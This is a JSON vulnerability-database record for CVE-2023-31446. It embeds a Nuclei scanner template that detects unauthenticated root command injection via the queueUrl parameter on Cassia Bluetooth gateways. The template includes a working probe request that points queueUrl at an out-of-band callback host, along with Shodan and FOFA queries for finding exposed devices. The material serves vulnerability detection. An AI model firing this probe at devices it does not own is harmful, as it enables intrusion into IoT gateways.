{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2023-31446/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2023-31446/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2023-31446/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2023-31446/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2023-31446/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2023-31446"},"sightings":{"href":"/api/v1/sightings/cve-2023-31446"}},"enrichments":{"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2023/CVE-2023-31446.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2023-31446\n\ninfo:\n  name: Cassia Gateway Firmware - Remote Code Execution\n  author: DhiyaneshDk\n  severity: critical\n  description: |\n    In Cassia Gateway firmware XC1000_2.1.1.2303082218 and XC2000_2.1.1.2303090947, the queueUrl parameter in /bypass/config is not sanitized. This leads to injecting Bash code and executing it with root privileges on device startup.\n  impact: |\n    Unauthenticated attackers can inject Bash code through the queueUrl parameter which executes with root privileges on device startup, potentially compromising the Bluetooth gateway and all connected IoT devices.\n  remediation: |\n    Update Cassia Gateway firmware to a version newer than XC1000_2.1.1.2303082218 and XC2000_2.1.1.2303090947 that properly sanitizes the queueUrl parameter.\n  reference:\n    - https://github.com/advisories/GHSA-89ph-wr9x-hcfc\n    - https://github.com/Dodge-MPTC/CVE-2023-31446-Remote-Code-Execution\n    - https://vuldb.com/?id.250210\n    - https://blog.kscsc.online/cves/202331446/md.html\n    - https://www.cassianetworks.com\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2023-31446\n    epss-score: 0.61081\n    epss-percentile: 0.99131\n    cpe: cpe:2.3:o:cassianetworks:xc1000_firmware:2.1.1.2303082218:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: cassianetworks\n    product: xc1000_firmware\n    shodan-query:\n      - html:\"Cassia Bluetooth Gateway Management Platform\"\n      - http.html:\"cassia bluetooth gateway management platform\"\n    fofa-query: body=\"cassia bluetooth gateway management platform\"\n  tags: cve,cve2023,rce,cassia,gateway,cassianetworks,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        @timeout: 20s\n        GET /bypass/config?type=sqs&keyId=test&key=security&queueUrl=http://{{interactsh-url}}/ HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: interactsh_protocol # Confirms the HTTP Interaction\n        words:\n          - \"dns\"\n\n      - type: regex\n        regex:\n          - \"^OK$\"\n# digest: 490a0046304402206ed54db50f6f84baff8a8955266f8e7ac4e9b11b15b19dd4464ec13f7ee4830e022041eb4925e29f3f59b238265fe8a0c9ed8295bc267fe703a13d05eb862feb8b15:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2023-31446"}